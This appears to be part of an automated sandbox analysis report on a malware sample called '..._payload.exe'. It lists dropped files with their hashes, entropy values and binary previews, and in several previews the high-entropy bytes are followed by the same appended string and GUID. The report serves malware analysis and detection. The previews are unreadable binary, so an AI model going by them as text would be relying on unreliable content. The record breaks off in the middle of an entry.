                                                                                                Preview:<?xml*<.N..../.:...a....... .b..%.e...sh.Y.A.m.m3.jk..........m..:.{...r...,I.Za......e...!W3....bYVS....? ...OT..:~7C.k..j..".K+P].Y.P..V..\.C...&.JL..c..W.)..{.W.s.&.....E.j.s....6....!..q..4...........h......]v...lw4.*q.GLK0..Q.......n3......6.02]...*...Sw.\.R...y:L.w...L..*...KiY.K.U...E.+....B..<...Qk....;.............Dkn....RJ.D..vb.3..SQq...'n.~^......*.Q;...p1Uv.[ ..Z...Cj..~..3.A+k.Y.?.......{...p/@.ds...Q.....=.....h....d..ue..I.t..<.QP...I.O........w'U.i*-Il7.....F]S.d..a......`=..=..y!...O?.-...C.N.@.e.,.f....O$}.... .Shy....^...Y#....3a.O..CW9...H`..qch...8k..FI.?<.e....0.E@.......Dk4..HDe|.2.chab.`5[.]....p...q.h...{[....a....6W...j.....\c.(..k5.r.:m...BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1082
                                                                                                Entropy (8bit):7.794908304531401
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:9BlQKa6OPh0b+AQpBvaKof+41rzVoGz1NoBGBYugDjqPpSjx3bD:9Bw6QzSx1rzVoGz1NoB+DSOBS9LD
                                                                                                MD5:6A45A03FC2078898DC6B09B36371C677
                                                                                                SHA1:E33BB23B5C6972649C705A03F7392B1AD7E9EE80
                                                                                                SHA-256:15989A1EDD32A0142181A238A13B6F975C7551183104BC6928C6BFB936C6D208
                                                                                                SHA-512:62D62D911EDFFA5AFDDF126E5483EE8B13A7F716B0C38B3F708FD32483029FA7FAA510981BC727F7421344B0942A0B42C7351529E14F9F82ADC13570EF94C689
                                                                                                Malicious:false
                                                                                                Preview:<?xml.....a?.,J.d..7..X&..O.@my..r]..d.\......Oh...}Am..w.5,..(F@...p.P..N..\....Sj..=.O#.w.>..UL.C...s.>y...S..q.&=5?.G.H[d..i.K......=7L.b.;.....r.iq}.]...h..F........d.%.2I...u.......G...A...}/o...i....)..u3...J.Gq..Z2...G.\.b_..\.T.oE..~oV.....tDp1..O.i... W..J`.{n!...o.w../.....g........w4....|...k$...).D....T.......N.t7.F.........f...-.(h.[%.G...v..".O..z.....n.d].....G"5.&...E?..Y>Z...@.....)2]._BH...|...v.VG.c.+7.x^..E.L[."p.qn.......W.NO.Ub...Z....z.K...G...._..Z..7..Y.2...H. XimM..z..L..H.......(i-.....mN..l.~..S..0...f..c.h...y.....2.....]7..M.....Ay..o..~...7H..,..=..Ec..k.......5.J,...).&9........(.E.E....'..rk..7...'......n../..s..b...0....@.n.....2..7xW..7.......gM}..K.p....O/.P.......\.S.....G?..w..)..bz...\..is5..nk{..=.G=.........04fR-..`k....(.5.Kf&(.....n7~.%~wq...O.l....v..r...$..i... =...vHq.....1I..9.7....I...q..]..dE.k)..-.[..p.<..E.'.F...A..xf.6...|..y=|?YI&U..O...H`..e.....4#.E....T<W....I.R.1..h..N-....w7#..W(
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1061
                                                                                                Entropy (8bit):7.799471400731409
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Z3c3S2FSjVSg8LXb5g9xfHL6E2rZLCGvD9O751wa7VabYsGphYVyx3bD:GFUjVSgcABkZ2pbabPVGLD
                                                                                                MD5:DF9492B4C28C8605E2A9C867417F00D2
                                                                                                SHA1:C77F13A8FEDA3436D04EF45E4F732AA820FDDB22
                                                                                                SHA-256:DDE691A208D5630C6B9F578826AE2EB899E796F49433A0485C066C5530C26519
                                                                                                SHA-512:B10C24ED84714CC462C294713818E4A154D6D03970C36310A7F339105D16966A8BCBAA75C125F05BB9980416317E77BCE97F98453D831DAD5CBEC97F298214CE
                                                                                                Malicious:false
                                                                                                Preview:<?xml.m...9U..M.N.*....go..n.%....@s.]b.....V4...P.B.IW.>e.u...`?.Z...R.vd.C}..^.5.-.GG.9.\.......9.......*..^..t)...qD$G>......1..n.....^. .4p#.L/..a(...?...s".l#.{V..8....r......f...u... ..b........7a.>.......7.?...x][:...om...|.5W....<..oo..ix..e.)..q...Z(.E....r|.6.}Hn.g....".W.2..d........K<...S..}m....7.S;H1IVw...,V%t.a.2F:/_=.4Ng......v.Z.....fnn.....(#....'...L.[...o-..v..X.C.6....-n...L..7.x..[{.t......O......&'h.s.?...;..W.Q6.vh.......eh.O0...ju......8..Q.U_..??.....q.np....B}j....}.......m.r|+.!......I..jX.f.h_`..\.uZi.......7UQ.i..Nv......*,...*.U...A1......yA....D.....TgV.. G2ym..Yq.$..B.........|.....xU..%m.H..08.*K.Tp".f,...|B.#..j...<.....>..@H...r.. ./;.\WF..%...7C. 4`..].!.<.*&.ETC'..!.x\-6...W8...&.a2.=.&....]...L.w......W.}t.,..bS.?..9}J..bS.xC.X.gE.3T.a0t...TE....*..R..8.3.4..)I.Jo.Iz.....2...!+.B0.y2..<K..^.sUy.l.../...L4e..K....|.-W.9.{.......|..u.?..}.}O....w....D.......d.o.$........g.3_y....m....GBUcuB8PRg0LNi380a
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):801
                                                                                                Entropy (8bit):7.684772165179362
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ejBezlMuxkj/TLoitnyIWkJkMB9+/xa4F7QGlSZx3bD:ejsCpjnoicreCgGeLD
                                                                                                MD5:8E4423ACE2704D9D87DA58E78E5E4389
                                                                                                SHA1:84E2A2097B4E9C08604FE200779F988F447705E7
                                                                                                SHA-256:CA8B51C628C4AACE4A1F52768444BF3D8012959166BCA344901DCB02AEE60167
                                                                                                SHA-512:A92B21A01B53446878DB4390F122B426FA43CC0D7217E55555B0C3DF9D1D1F259AF24601A31661E35D12BBB58D9923175DAC1C8B9BBECAA7894446F7F0DD1620
                                                                                                Malicious:false
                                                                                                Preview:<?xml......5..!H.... .UF;.Mc..k.....E.e...@.k.j.G.....;......U...n....$5L.F.U.4.B....P...@....Q.^M.dZN....b.....{..u(.H..'..l..1s../.2.Ka]..(...K^Z6..Z..A...F....n..5..1a..Ze.g.........X.=.....y4..c.%.Tt.../.'F.7X./.a.]YK..P..]....!.g....._e...vcM.\a..67..Z.G3..=$....|..).7.p./.b..4....<.g..n..\.}e...U.....d82..PR/..i>.j..(....X[.*`6D.$..].L.4^.3...Y@_....$._..R..u..6.M......(U.I.x...ZJ.V................=.....8.c/...^....r.......n.f\6...%.5..z]c....?.Ag..Pn..V..lL..?n......9~.......S...N.k.$,.Z;2..~.M..}+.d.+a.......*2.....Ao..Y.N?1.a.GJ].~..E......8;2..'<.P...e.VCT.l..P.\.3...=.)#.......s.S..x/3A..t.2Y...<.74u....9$.K.3..L.2Fn...x.....:...f..C,.C..r..O...uYH.>v..._......K..&...OBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1485
                                                                                                Entropy (8bit):7.873329974043424
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:A8407Y5C84GXTJXH8FwfbY3zbHvzbtRf2ZFwC7Lk3QcqFHgA2d99eBowfyqx3bD:A+n8FXTJX8AbYf/tRkn/k3ihgJKf/LD
                                                                                                MD5:22C58CAAE6FA462C03D21A7276826BF4
                                                                                                SHA1:D3592E1F3645CA9B672C64BCF5F89443219A3BCC
                                                                                                SHA-256:57C67E3F84514D3EE59F2088F1D06C07364F77375AEC544EB2CE03F518D8A21F
                                                                                                SHA-512:D25F5F7D5C225732841C92E0810CB5B156DF5872E716200D81785E3E21EEC97767CDAA2386A85EE2385ECC674D5BF5DBF1D818DCEB6C0C82E8263F635A4D7E2F
                                                                                                Malicious:false
                                                                                                Preview:<?xml=.c....=.~\.....j3.ww.. ....K...;...?...9.$.Z.....A.....K...b[.F.,..f.....<<....U..^.HR...Z.QGz..0...e...A....'.V.3.(P..n/...y.......1.e....B.R...[..>....^.Q'....o(_..G-.....>d..xmD....xM..2............N.V.b*...gT...A.{DC#$.f...jv..]....d.$...@..`O......]...y..|..o."k.`x..u:...~..0o.d...!.sh..c..S..T.`E...g7.!{v.......]..@_....s......'..Au.T..[.u.W<}5h...l..L$...O........a...{&..[u..Tc&..X..q...n..G.......k.v.|.k.j....'...Y...rp...oJ.X.:.}.jb._..Y..3...._.I.8..#T....r.M..0hN.......n*....Y..U..FH.\..\B......[.]...R..VDNi.+.q..!w.E...6../.J..?..y.0l.}3.&j...1..$R.I.A`.?.....!..2.). ..|..-......v...3.2.a. ..?J]....B.0L.|....<^.)?..]m+..o.....7{..}.]o.D../.\....6Y.O...f.C...M..."Xr.a.....A]....$..p.&.C...T........./.W,.......fKC.........2..2...2.w...N........B.tc...A.....X..9.#F....@............1.(.G..K.).kQ...n,Co;.El....f..%.....[R..+.".....044J.tVY.e.D.u.....>..-.....|.....X+..o\w.hO}.~..^..a.%1..RA..3....`.{Xse|..|.hs.`..+.`.9{p.z...J
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1340
                                                                                                Entropy (8bit):7.820205790648357
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:UlYEF1Cxdv1sSzoMKlCMlU6BpBFrxdwsUabSpUF9hqPxUUxaAlp/e/FKjVDx3bD:UybR1zzoMKl/PdwsURCGxUOaGRpdLD
                                                                                                MD5:F619B8BB6D236350123A148750AA5804
                                                                                                SHA1:E5C022E55BE14B0C564F68EE9E48629AF679B42B
                                                                                                SHA-256:8DC54040458444D4D685EDAC97F1E3AB9222ADAB14839DCED1A9E67A5FCFE42C
                                                                                                SHA-512:063EDFD2731AD846DD59AAA20072F3BA6C34B0BB2584FD556D8CF894AED38911820D3000E9E69A23FEBB281B4ABD85BCD54454817B8D039D6DA15164309F0BD1
                                                                                                Malicious:false
                                                                                                Preview:<?xml... tY.....g._.b=.MRu........R. .z8}.......<..5..(.....0.)Q...DAE...H.t..Ww`.0,.G.A....h..<..y..(.........N..o]...c0L.25....L.....Q:v.-...Hq..t.pf...l\2.L.OiI88..>Y.=.....n..&..wV8..Yn._7..H.....7J..)..r.......U1...5X.lM>S....#.o.H.OU6D...8...Zwm.s...5):..o?XB...|.`........=..../3....... .....,.T^.M.|*...@wu..|.V.._x.Al)..WS"Z...H...~........O2!.kj....x3.1....;v.?..A....=.m..7.U..1.b`XM*P?M.t...@.P.&.D.s.O..g.@.....Y.......{@.N>....@..8.@.7..j.!r...Q_...%E.:c-..U..`.._..p1.....+.lfg..k....[o.......U.!..;....B..5....Ti!n4.d..?5h....(.....-.w. ...F..bz.dN<.....<^....Z#..0\&.4.[..n&.....D..A.....U...u....O.0...2Y.....g.V...Uj\.o.z... *7E$...]$..y3!...Bk.h,.Hk..4.p....7.......fQ..t....."..u.SL.....6..A..U.!...O..s...<xg.....C.&.mX..E.o.....nlkn..v.:.:0.....*.....hBs...o.k..C...w.'F0-R#.O..a..I..|}.K..q4\:...Oq....+.%........!%.H..:.....Vs. )]............|.I.a...L.......1..@....i.....1.......).V.1..q.#e...v........._.n'.@.8.....%.<.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1261
                                                                                                Entropy (8bit):7.821895091266665
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:BHEGYg5oK7cRNJsOQpJwpXDQOdVCYD21LxB0i09Jn0IrJGLrkPaE6mbAx3bD:BHRYAorxevIXKtzKp0GGLrkembsLD
                                                                                                MD5:7890FA01CD8BB889CD8E9FE30FEE5A57
                                                                                                SHA1:4ADA3E0E42F50CCDD75480A73D00845F88DC74C1
                                                                                                SHA-256:E08CAF906B36358654FAAA50D966D7E48F3FF5A040567AE7CB5075CEA7081CAE
                                                                                                SHA-512:3954E4B4D73AA81653362BE73A899798F4ED84442BCC50125608892429308446F710901D27F1DAC15B75B5A4B459ACE33674E5752675E145817658DE2314431B
                                                                                                Malicious:false
                                                                                                Preview:<?xmln.m.............a.(...x.`.....TK~.-.j.....N.'UW..X.U.aK9T..+..q...b......h.Q3Gz....Z/..........Cc.......>y.K0...|.h..1Ip6~vb s.....SoF:..t...U.h..s[...9..O.[.....G...E.7....^.9;n..he...H...@v..j.@..A=.u..M..2.L6.A..x.o.V..P..L+.#..FBGD.A."...gd..i.iVO.H.s.'..YX..-......[..,@...h.k.......tn+R.G.....}.(.fn.o6.PZn-.".8y.|]S....q*..=..o...o .Bz{..+]..i.k.Z...]......N....D...`v.......<....."o.Vj..l.1.."..N..'......Q.X...V.P2.\..).Y.?..]..Vt.....'..f..$........p.P.h..........[..kJ.....e....Gh...4{.o...sv......'..+......-^.(...g:..X.:vl...S.@`...P.G..H..7.j.....#D.M.6..qb.q.....+..`.q.}4...........c6B]...|.Z......./..c.z...0}+.O.{..J[0...!.... ..Y.)P...[._j>.8ez'p.o7..Wn]........)b..^.'....{..cUn...G.G......p_.....s{..""......o.....j....5....., .z............R........o.1.F.ZbR.A^...#\5.M!].kq;...@@....m;..|.hk...C- ...'EA=.5`Ci'!b#..IL.........4.'tX.......q...33j....{i5.*lf....Q.0-1.F {....=L.E.{C......:..Y.T...{..D.....o...$Rt......w....C
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1268
                                                                                                Entropy (8bit):7.839363212633086
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:rKza5EcrxgRWGFTn84AehZsIHGikVqwcXwgBPwZNyOJ1+MsaCCQ8r9Sx3bD:CGaT84AerHdxwHZui/ZmLD
                                                                                                MD5:55D941B8252008CB75130E679FFFC764
                                                                                                SHA1:0158C84045DC3259A6F677A21B41EDF00D00B6FD
                                                                                                SHA-256:C5BF1D872E411A918D0544BA7E5C83C084B122A04AFB0427FD8452353ED032ED
                                                                                                SHA-512:399460D41747BC1B57E456D2B92E51BA4DC1CE3F25953B11473C0AC6F203EA6766C385C9A58690076A51D7463ED3CDDB6A174A966FFA4B58D5605EC6E09A9019
                                                                                                Malicious:false
                                                                                                Preview:<?xmlY0V,......n3..%..OzY....A...".?b..<...E.:L...f...94..'.VgL{(...K...4....!\.t.*.........5,6&.>(q6t.UJ..@.[...*.<..z(#.&...N..;..........z2T..{.D..d.L5...........KA.....|.B..k.e...I....G.7;py9.vY.m......qsn.#.a7...e...@u3R.L..........szJ%..$.%...`...Y..Y;......y.c..3.&...oK.Pe....i..'...........F.6t.$#TV.>>.W6..]!._..>.s%g.b.....h..q\..D..A.d'=%B.m.B...[`X...&....a.....-.!.`G...R.fB.m(..,..n|aQ....5m.l....B....H.?.#$5.2..O.!-..\{6&...!.x...\Xp........q.bv.x...eZ.=?....S}Jg...RA...E...b.......nF5.l.O....Q.mEL.,..Bg8H.u.MM..@....XW.1....3.9.$@.l0....Q........k..8...~.7......).....f.....}.*.n.....*..BT.K......5.W....~2..gy/b...R....0........,..F'.2.]V...$..N..g.?zv+D..3.........K..l...EL.x.]..y[...Surg.S..K.{=.Y.N...6wpC.IV...4.w...l..$..bl.PB|......._.bl.....<L..|7.x^.d.!4..>....+c.>./8CV....N.C.... ...../..&.}.......Q.. ..%k-...c.-..........x;...{'.Z...'.pX.x.~.Ns.$.x.AU..w&.*......^`.....&.X...D..:_......UV.2..... ..K>W...;.W.s,...&_.B..P.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1815
                                                                                                Entropy (8bit):7.878555000782631
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:NbyFNlYJwL83QimklPfdmouG6256A/MEaVwk7qL5UK8EuLD:NbM+KLOQimgfdmou3xOkc5ULEW
                                                                                                MD5:BB3ADD1EB90F7BA375DF4735D1BA47D1
                                                                                                SHA1:15FF265AAF69AA1468F2698F7F4712DEEDA3049A
                                                                                                SHA-256:06159C4F7A7CDF3B21A96FEA520AEC4B93B84363DC194A7EA49BF31809985BDA
                                                                                                SHA-512:2AA39E715D70CC49DC8C3A469500CBBC6880F33E8D3FE12BA4BEB22EF60D60C833E8B897A75292E8A728A8AB521CBB2C3B700945612B1D039D9449C3321A639E
                                                                                                Malicious:false
                                                                                                Preview:<?xml{.9..2$....V..,m.N...&.q.j,Q..d../E. ~........o.'....'.E..K0+CEQfN.0...Y.6..SL...../<..a~..X.j...C[...\...Y.4....J./....[..&....5bzC.....E8......N tTV.Bgu......A.....w...~...2.TG..'..m#...4...^%Gp...*...}.J..DfxD...k^c.c............n{qP..i..rp.......2h..Z.|f.1b2... ..."&2U...d7..x.:9..l4..RR.r=....H..k.wu.....#._.b.).........[#..GN]...e_..i.]......:..c.........t..$Jqx.bz2.a...~..O%.j~;.....g.h.H.M6v..4.E.-. .)..EW].Xv......NL'...L..M.#`..In#.x)...`84T,...t.z...x|L.\x-u.l....`.......J... .RW..9.H.@.....B.`...4.. >.....5sz.........@*.......bA./e....c9....7...m.......xW...-.....GE..5q..+.%vi..b....U.Z......6..&(.....&.H.OL.2....>=...\.^+.%..`..m.!B.~E...][.3P.fCB.M6.......M|..b.I.&...(Q..#..&.I......?&W..`.u.-&}.]E..c..X.....>.-.xJ..OT...AYg}N0....U....Z.*./RkBD.T.~o:.........Sj...L....u.a.].C ...o..! 2.. .E&....4p......}.2_7E.1..........\..*.....4.cqTf4.=.1..5GQH)...4.t.O..I..p.....xV.0I.J....VR....h.M.....z.7......[.S......fb....W.&`.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1004
                                                                                                Entropy (8bit):7.7437344858386545
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:151r8FZ9k1tMZ1glo3t2Q4qhlLuU7wE+cvS3gqDa1KwMAIIEY3NilZhG6gqrSWWb:15h8FZ6rpAAQxKJML4jSH9i8NGQx3bD
                                                                                                MD5:6085E23A80B2FE0486CFF7133214DB29
                                                                                                SHA1:3895642F7C0974D7EDDBC36FE504DA9C1681816F
                                                                                                SHA-256:4503DF24F398B4021237D3F95EC9D12A56F70F67F2C8D96BEAC19E113F0D9DEF
                                                                                                SHA-512:EEBF8BB40F1504A767B9A87D949AB2963F27231D4D9E37F419C7D6A81FA8D9272EFE139B167B41432A6434BB02A18D714D2003F7403827466F20B335573162C4
                                                                                                Malicious:false
                                                                                                Preview:<?xml..\-..#v~.m...sy..;...;.....Q.cB..s<D..u...oN....m..t....f.6....t......Y.p..}...C$B...)...b.O.X......t.g.P.0.......=...?!.Xt^................q.[...f...Z...."..~Y..../.....I./Y..^.0E.q.`....D..)..AE....g...;U.#$.....``...t.....<.B#fv. 3.\..o.}(...5..c'...6.2......(.(>.......^1uo|...;]..".0..J...W.7h......}8(....P.w..3*30..A.....{.8.....P...Q~~....Ls...m..6.m.:W...y.......~......R+..;..U3. o.u..^.,.....Y\..~..l.....J.t...Q.A.L...[...Q...[..........u]Y.x..C.Dh...v......w.&@...J..H.....kod.....PE..zN...Rukq.?]....8e..5.|.c....w..e..;...S....._9s..P.A.....&..).7,.{q2{|x.......F.N..G. UM...a.8..@...vt).Y.@.......?...d1<.((6.#xM.....S^.Y".5.6./6 <m@1^..Ido..0...X......r..u..3Hch2-..u;h..g!....t.L..b.5..t..p.....0{z.u.D~(q.Z.Ty&.E:..N..../x.T.[...b............&..<d.5.K..>$.2m...w..G2{....9:...O..X d......YL...qs[.Bn.v*.q..a..J@%t':.J..m..0#..:.$*.x.c..}.}.....e ..%...'..BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1950
                                                                                                Entropy (8bit):7.911840377649479
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:AJcE2Ep2ifN7D/X5yMuDHiQdIluXpXRLOV0m23TLD:UcAll7DQZDBhLOV6r
                                                                                                MD5:550FF17A435442CBBABFDC63F3E10661
                                                                                                SHA1:83BF0682EF99B02078E3B3FC77B7936A846E55D2
                                                                                                SHA-256:148CAEC3ACC6314A97D7A63DC2E087C2E73FCF694C35867F54FA53AAB58D18B2
                                                                                                SHA-512:A5FF726BCAEC7AA61DFECEB9CC3506A52D39F8B60627573475CC85B84928444A2D19F40649901D23488713FD5ACDCC2EC2F09E170DDF1F2B6D43E01D5112A8FD
                                                                                                Malicious:false
                                                                                                Preview:<?xml=...J..Q..Z..L.O.H".....W.)...]Ow...i..Jan...h1^-}.9..w......m./....Y..hK...+..#t.;.y&hb.....<.O.2x......2..&...;kA.....Y..Z.ix.:...4-...h(.8=..d...^.".r.q.. ..0#.9. ....-]M.>.oo.A.Ug....42..K."..nK.....|.6...D(..j...;.. x]. L..u.L.....%........4*s..|v...&..a.pd.:...=J....4..A.ox.T....D.w.Q.v...O...b...Ia!.......R^lL..BK.!`......y....I..S%'.....!..... b[.m.a.f.n..nDS&..[...PI.1.`....H'5...3q/.f+q.V...........J.......5I.M.}.....'.<,L...|.q..z-..%.$.W.v.T.s...v..Mw....&.p.=.6..s.n..n.W[....Z..G.Ju.x....X.L.2.(../....uQ$^E...g...=.....ag....G.....e.-.............1Tb$..F.&..@sh$duigN\..n..d.m..>..L.^P7...N}.P8.k.../).I]b. ...~...e.7F.Y....'C{.......M.3 q0...._.....J......Bc.rx@.Sd#..hXP.{..6...Y..)c..B...4..B.N...Y..|,.p.b|n..NC.5.....Z.D..m.......t..p...d?:..C.....9]............r.!B.F..a.V.:P..t.....w....a..I..Eo.bnW.w\.J.s-.o.L[<!.5.c....S7....D..B=......C.;eh+gZo6U.5e.....n.d.R.R..4..z.x0..c..r8. ...+..V...t......J.k....?u.rCfbz
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4121
                                                                                                Entropy (8bit):7.954897361264905
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:lIoRhRNZ+6ciFkUjq+7VrGBci6cwU29BrrczPeSo:lpRL5Njq+5rGB/642XoPM
                                                                                                MD5:DE4ED79FE2E291B14BC4ED29C038C357
                                                                                                SHA1:692D77606ABD1299C1297D0216A8BF0508436824
                                                                                                SHA-256:C4818A5B7E6EB7F20DF7F1D4CB25CF6E858CAE0E816618D36CFEAFF4A5A9EDFC
                                                                                                SHA-512:83376E63C5A3C46BFE2B5B4B394F21CB8C316061770D8DCC902EFF4D5CDFFA99072FFADE0EFAC389E228C78B85C45C9A160561FC27142E1F9202AA56B674DF72
                                                                                                Malicious:false
                                                                                                Preview:<?xml.{... G.'G>X$aE.....~....;..{...x.......~C)..../.,.........._.._E.".x.Y....g...$.z.....5..R.1..)..)w*.|5q.e......~....J....r.-3..0sQ....y({8..m.'I.'.T.{.6..b@..+.......t&{}r...3..=A....2.o.ban*..X...Z.R.xu..N.y....9...+A(.._MO.;t..W\....F.?...$w.........U...T.o.6......8v..-...........#.o5<-}.l...<..&y.^O(..I....8Q..At..P..lV&..0.].3....sF.....7d...r..F.m._.Y..........m..;.....*.N....6.yyp.j.V...<d......."..........#.=I..._.....'.T.(t...[..H..29yr.G..iv..n.|.N..?.b.h.s.Y.%M..R`!$b=b+..dt{O....a.Ma?M.I...Jt.BN....uD."f.G....``..h......U.../2..+Ji.ZHt;.vs..Lu.+.._...o.H...r....@.3*M..8.r..A.jd....p.s...[.....U.......x1.&..>..L.V#.C.4n...W5..6..TL.E.+%.#..]0'.....~).q..:.)..j...d...jA.1......&..r_.I>..dG.....Z\....wo`.f.$..<<.>......?.U.k...`...K)!g...T...[d..7.Y=..-aUm.EuX.(-PKb(...N.8+..\m.q.r/.b........[v...i.W....'.q=.._..{)..mwK#...A..[Tr......Q....1........p.^,H...".@...(."...U..?...%..9.G..i..J...HO!).Oc.t.PYoU..T...2#J
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1585
                                                                                                Entropy (8bit):7.865641951279119
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:rArFNjXn1cBufMxEkR3Z0HqdoQxkobTWQd6CYUeOEmjXwNsd7+FL43jEor0x3bD:rkFFJ6Z0MSoTYUeOEmjXwNsB+F8ASQLD
                                                                                                MD5:2BDB6558C426D8B4C00629C0D48AD854
                                                                                                SHA1:156A2237066C568B99FC2B9682DD062A3FF5BFF9
                                                                                                SHA-256:688A5F817CF2D1085281AC62771024045EB55792BBC48E30CAB03B2FC0FD0BEB
                                                                                                SHA-512:3C17D3252924568CED1AF962081CCB2E42E44DC397D4356CABD3A94917BA997D45A9072FB3FE6DA7B3E29684CE114B69ED6558E611C30E13FCD60719F4A869A0
                                                                                                Malicious:false
                                                                                                Preview:<?xml...D.'z..Q|...74..6L....G...$....s(.iIt2.K.N...&w.....a6....|r.r@.r.E_..,5b3.'I..o.Z....[h.o..Lp.;P?.'G.zj.....;.h..\.d).Q....~............0....R@..5........!.W....(.1._.....Hr....6m...Eb.n....d ...v......mn...GP.C#.......B....1..1...On.y..-U.....[.<..;=.....r..O..p.Z.....%F_.........o..c.n{...l`X......=....[T...3..X'...'....Z...../L.*+:Y[?[.Ax.r....|.tU....s(1.gW...>DgQg.2..5Fz....q...2.b..../=......r\..)f0f$.U..s..M..Ou...B.Te..s.....e...f...8Q.{..i+..P....hbF5..._..G.]5.P.gM.-0....xV.39...l.Zx..~p..zC.5l.y..(.p.......7 u....Y#.+.<(Z`...`...j.H.\~..`7..g8X..P.....u....2..:..Ed.w....Zv.,jK..q.i.s~j~...Dshi.c.e.!....S.5n..<..]G2R.C.....IJ....e..W1..#P5}.....|.\L9<.....=.F..R......@..k4.d./S.......e.d....\9.I...N..hZ...7..z......m...?...t:).Oo}.R....;...N....k.....RF....5es7D.f....3..JXd.~bRo.f.........:.......}?..................>.~/.lL.r../..v#...]...M.../..zU..t.Z...nq......fi......K.......y`O.4....o...R9.I_<.o.=p...4%...1
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1939
                                                                                                Entropy (8bit):7.899264285630679
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:6jp4Eb608hiUViWLfKAviGh05u1QjNRXcf4eiK87xe48mLD:Spv+nVhLf/iGS5aOcf4Z7Gu
                                                                                                MD5:8CAA74760727F99805A91DD0466F6A87
                                                                                                SHA1:6926DBCEFCB59CBDFA81D884D0360D87BB364179
                                                                                                SHA-256:07F51DA31AED3261EA40DE01BE772FEC0A1151721EC7B9DB69429073A55CDC19
                                                                                                SHA-512:3DAFC028792D544BA51E9CC61409A34A09EB765BCD4B6B304E6BF7AE97B041D7313C3D64F236305990B9CFAACF6278B4BB25B8D7A2177B8B9D4840709DB947A6
                                                                                                Malicious:false
                                                                                                Preview:<?xmlQ!5.)Q2.8.nP.N.:..../..BH.t..,....H...?HV..p.5}.9S..r....(6..?.X....../.fJ3.;...}.>..(.0...3A...d.3..)...R.=.sU.=e..p..H...['<....Pr...F.X}A..Rh........6...1.M.Z...\..._8.....Mc.'..z..un...%z{..c.......%.H..(.xYW.A....t..J.$.W4.K......kL....y*tq...c..wL....|......:wL..tn....c..U[.;N..b.}.R/..A..R.......[4.=...._._...Ll&f.p....E..]b..V.X...}C.({|ao.....[...?....D...%M$.P...[L..z...^F.?.r...VJ0.[.xI.S.Q..C.l8.7...[.....zBL+.;...aq/...w......$..J..{.....*K.......;._.[....s.....c.S.J|.F..P.0..mjO.....2.C.OTz....w8.r.....j...v_.MRe9!I..9......j....X./.x....Y.7s#...s.^...%.u%-#.X.*.tWu....@.Z7..b......V....Fc.'..O.....vR..@.<..K,&S.$qw.{7.p...d..,..?le>.."..f.-.....9.Z..Yy.sY.9.M...|....;:........J.(f.X'..c.....r6U..&..AUG..o./%O^..7..n..w)...........V.% ..*5.a&....?.....t.>.......x..9....`[...g....K.9.x}.n>;....L..Q........`.p6+...C..{.'[J.D./n.... `..O.....Nn4.S.iX...zr.-../(D./5.+......0c{v!.K...E....2R.^.dSZ............c ...c.0i.'.`..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3091
